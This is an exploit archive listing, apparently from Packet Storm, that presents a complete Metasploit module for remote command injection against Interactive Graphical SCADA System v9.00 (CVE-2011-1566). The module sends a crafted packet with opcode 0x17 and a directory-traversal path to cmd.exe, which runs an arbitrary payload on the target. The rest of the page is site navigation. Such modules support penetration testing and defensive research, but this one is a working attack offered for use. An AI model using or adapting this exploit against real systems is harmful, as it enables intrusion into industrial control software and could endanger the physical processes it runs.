Interactive Graphical SCADA System Remote Command Injection

Interactive Graphical SCADA System Remote Command Injection: Posted Oct 22, 2013; Authored by Luigi Auriemma, MC | Site metasploit.com; This Metasploit module abuses a directory traversal flaw in Interactive Graphical SCADA System v9.00. In conjunction with the traversal flaw, if opcode 0x17 is sent to the dc.exe process, an attacker may be able to execute arbitrary system commands.; tags | exploit, arbitrary; advisories | CVE-2011-1566, OSVDB-72349; SHA-256 | a7114479b9ce7f63393a233814fca94f23890b35fff1a4000dbd132da087dd09; Download | Favorite | View

Interactive Graphical SCADA System Remote Command Injection

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Interactive Graphical SCADA System Remote Command Injection',
      'Description'    => %q{
          This module abuses a directory traversal flaw in Interactive
        Graphical SCADA System v9.00. In conjunction with the traversal
        flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
        may be able to execute arbitrary system commands.
      },
      'Author'         =>
        [
          'Luigi Auriemma',
          'MC'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-1566'],
          [ 'OSVDB', '72349'],
          [ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 153,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'Windows', {} ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 21 2011'))

    register_options(
      [
        Opt::RPORT(12397)
      ], self.class)
  end

  def exploit

    print_status("Sending exploit packet...")

    connect

    packet =  [0x00000100].pack('V') + [0x00000000].pack('V')
    packet << [0x00000100].pack('V') + [0x00000017].pack('V')
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
    packet << [0x00000000].pack('V')
    packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
    packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"
    packet << "\x00" * (143) #

    sock.put(packet)
    sock.get_once(-1,0.5)
    disconnect

  end

end

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 63 files
Debian 33 files
Gentoo 28 files
LiquidWorm 10 files
nu11secur1ty 7 files
Adam Gowdiak 4 files
kai6u 3 files
gabe_k 3 files
liquidsky 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,036)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,495)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,567)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,739)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,489)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

Interactive Graphical SCADA System Remote Command Injection

Interactive Graphical SCADA System Remote Command Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Interactive Graphical SCADA System Remote Command Injection

Share This

Interactive Graphical SCADA System Remote Command Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems